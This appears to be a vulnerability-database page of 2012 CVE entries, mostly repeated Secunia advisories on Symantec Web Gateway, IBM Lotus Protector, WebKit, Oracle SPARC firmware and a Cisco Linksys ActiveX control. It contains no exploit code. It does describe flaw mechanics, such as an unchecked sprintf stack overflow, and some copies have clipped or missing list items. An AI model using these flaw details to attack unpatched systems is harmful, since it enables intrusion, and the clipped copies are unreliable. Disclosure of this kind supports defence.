VARIoT IoT vulnerabilities database
| VAR-201207-0236 | CVE-2012-2961 | Symantec Web Gateway SQL Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in the management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. Symantec Security For advisories, this vulnerability is SQL "Injection".By any third party SQL The command may be executed.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
1) The application improperly validates certain input via the
management console and can be exploited to inject arbitrary shell
commands.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
4) The application improperly validates certain input to multiple
scripts via the management console and can be exploited to e.g.
inject arbitrary shell commands.
5) The application improperly validates certain input via the
management console and can be exploited to change the password of an
arbitrary user of the application.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0235 | CVE-2012-2957 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows local users to gain privileges by modifying files, related to a "file inclusion" issue. Symantec Security The advisory states that this vulnerability is "local file inclusion".Authority may be obtained by changing the file by a local user. Successful exploits may lead to other attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
1) The application improperly validates certain input via the
management console and can be exploited to inject arbitrary shell
commands.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
4) The application improperly validates certain input to multiple
scripts via the management console and can be exploited to e.g.
inject arbitrary shell commands.
5) The application improperly validates certain input via the
management console and can be exploited to change the password of an
arbitrary user of the application.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0233 | CVE-2012-2953 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary commands via crafted input to application scripts.
Successful exploits will result in the execution of arbitrary attack-supplied commands in the context of the affected application. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
inject arbitrary shell commands.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0171 | CVE-2012-2977 | Symantec Web Gateway Password Change Security Bypass Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to change arbitrary passwords via crafted input to an application script. This may aid in further attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
inject arbitrary shell commands.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0170 | CVE-2012-2976 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary shell commands via crafted input to application scripts, related to an "injection" issue. Symantec Web Gateway is a Web security gateway hardware appliance.
An attacker can exploit this issue to inject and execute arbitrary code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
4) The application improperly validates certain input to multiple
scripts via the management console and can be exploited to e.g.
inject arbitrary shell commands.
5) The application improperly validates certain input via the
management console and can be exploited to change the password of an
arbitrary user of the application.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201211-0084 | CVE-2012-5851 | WebKit Cross-site scripting in (XSS) Vulnerabilities that circumvent protection mechanisms |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
html/parser/XSSAuditor.cpp in WebCore in WebKit, as used in Google Chrome through 22 and Safari 5.1.7, does not consider all possible output contexts of reflected data, which makes it easier for remote attackers to bypass a cross-site scripting (XSS) protection mechanism via a crafted string, aka rdar problem 12019108. WebKit is prone to a security-bypass vulnerability.
An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. A vulnerability exists in html/parser/XSSAuditor.cpp used in WebCore in WebKit in Google Chrome 22 and Safari version 5.1.7. The vulnerability stems from not considering all possible output reflection data
| VAR-201207-0459 | CVE-2012-2202 | IBM ISS Proventia Mail Security contains multiple vulnerabilities |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Directory traversal vulnerability in javatester_init.php in IBM Lotus Protector for Mail Security 2.1, 2.5, 2.5.1, and 2.8 and IBM ISS Proventia Network Mail Security System allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the template parameter.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Remote authentication users can use this vulnerability to read arbitrary files through .. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
IBM Lotus Protector for Mail Security Information Disclosure Weakness
SECUNIA ADVISORY ID:
SA49897
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49897/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
RELEASE DATE:
2012-07-17
DISCUSS ADVISORY:
http://secunia.com/advisories/49897/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49897/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A weakness has been reported in IBM Lotus Protector for Mail
Security, which can be exploited by malicious users to disclose
potentially sensitive information.
Certain input to the management interface is not properly verified
before being used to display files. This can be exploited to disclose
the contents of arbitrary files.
Successful exploitation requires access to the administrative user
interface (UI).
The weakness is reported in versions 2.5, 2.5.1, and 2.8.
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
IBM:
http://www.ibm.com/support/docview.wss?uid=swg21605199
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0147 | CVE-2012-3128 | Oracle SPARC T Series server firmware Integrated Lights Out Manager Processing vulnerability |
CVSS V2: 3.7 CVSS V3: - Severity: LOW |
Unspecified vulnerability in Oracle SPARC T-Series Servers running System Firmware 8.2.0 and 8.1.4.e or earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Integrated Lights Out Manager. (DoS) An attack may be carried out. Oracle Sun Products Suite is prone to a local vulnerability in SPARC T-Series Servers.
The 'Integrated Lights Out Manager' sub component is affected.
This vulnerability affects the following supported versions:
System Firmware 8.1.4.e or earlier, System Firmware 8.2.0
| VAR-201207-0320 | CVE-2012-0284 | Cisco Linksys PlayerPT ActiveX Stack-based buffer overflow vulnerability in Control |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in the SetSource method in the Cisco Linksys PlayerPT ActiveX control 1.0.0.15 in PlayerPT.ocx on the Cisco WVC200 Wireless-G PTZ Internet video camera allows remote attackers to execute arbitrary code via a long URL in the first argument (aka the sURL argument). Cisco Linksys PlayerPT ActiveX Control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
Cisco Linksys PlayerPT 1.0.0.15 is vulnerable; other versions may also be affected.
======================================================================
2) Severity
Rating: Highly critical
Impact: System compromise
Where: Remote
======================================================================
3) Description of Vulnerability
Secunia Research has discovered a vulnerability in Cisco Linksys
PlayerPT ActiveX Control, which can be exploited by malicious people
to compromise a user's system. The ActiveX control is
marked safe-for-scripting and one of the provided methods is:
"SetSource()", which is used to set the source of the footage to view.
The method accepts five string arguments where the first ("sURL") is
the URL to the footage.
When a web page instantiates the ActiveX control and invokes the
"SetSource()" method, the function in PlayerPT.ocx responsible for
handling this method is called. The function performs various checks
on the supplied arguments including a check to determine if the
"sFrameType" string (2nd argument) is set to "mpeg". If so, the
function searches for and strips "img/video.asf" from the provided URL
in the "sURL" argument; if not, "img/mjpeg.cgi" is used.
The URL is stored to a CString object and URLs to various resources
are crafted based on the base URL including an URL to the
"img/query.cgi" resource. Later, this URL is copied into a 256 byte
stack buffer via a call to sprintf() without performing any size
checks. This can be exploited to cause a stack-based buffer overflow
via an overly long, specially crafted URL.
Successful exploitation allows execution of arbitrary code.
======================================================================
4) Solution
According to the vendor, the ActiveX control is bundled only with
products considered EOL and, therefore, itself considered EOL. The
vendor is currently working on getting the kill-bit set.
As a workaround, set the kill-bit for the following CLSID:
* {9E065E4A-BD9D-4547-8F90-985DC62A5591}
======================================================================
5) Time Table
23/03/2012 - Vulnerability discovered while analysing public report of
similar vulnerability (SA48543#1).
23/03/2012 - Vendor notified.
02/04/2012 - Vendor response (WVC200 product bundling the ActiveX
control has become EOL).
03/04/2012 - Vendor informed that ActiveX control should have kill-bit
set if considered EOL and asked to confirm that no
currently supported products bundle it.
13/04/2012 - Status update requested.
15/04/2012 - Vendor response (currently checking which products bundle
the ActiveX control and looking into setting kill-bit).
21/06/2012 - Status update requested.
13/07/2012 - Status update requested.
13/07/2012 - Vendor response (determined that no supported products
bundle the vulnerable ActiveX control and looking into
setting kill-bit).
17/07/2012 - Public disclosure.
======================================================================
6) Credits
Discovered by Carsten Eiram, Secunia Research.
======================================================================
7) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2012-0284 for the vulnerability.
======================================================================
8) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
9) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2012-25/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
| VAR-201207-0234 | CVE-2012-2955 | IBM ISS Proventia Mail Security contains multiple vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in IBM Lotus Protector for Mail Security 2.1, 2.5, 2.5.1, and 2.8 and IBM ISS Proventia Network Mail Security System allow remote attackers to inject arbitrary web script or HTML via the query string.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. IBM Lotus Protector for Mail Security is a set of IBM Lotus Notes, IBM Lotus Domino, Microsoft Exchange and hybrid e-mail environment to provide e-mail content filtering solutions. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML through query strings, and leak arbitrary file content. Vulnerabilities exist in IBM Lotus Protector versions 2.5, 2.5.1, and 2.8. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
IBM Lotus Protector for Mail Security Information Disclosure Weakness
SECUNIA ADVISORY ID:
SA49897
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49897/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
RELEASE DATE:
2012-07-17
DISCUSS ADVISORY:
http://secunia.com/advisories/49897/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49897/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
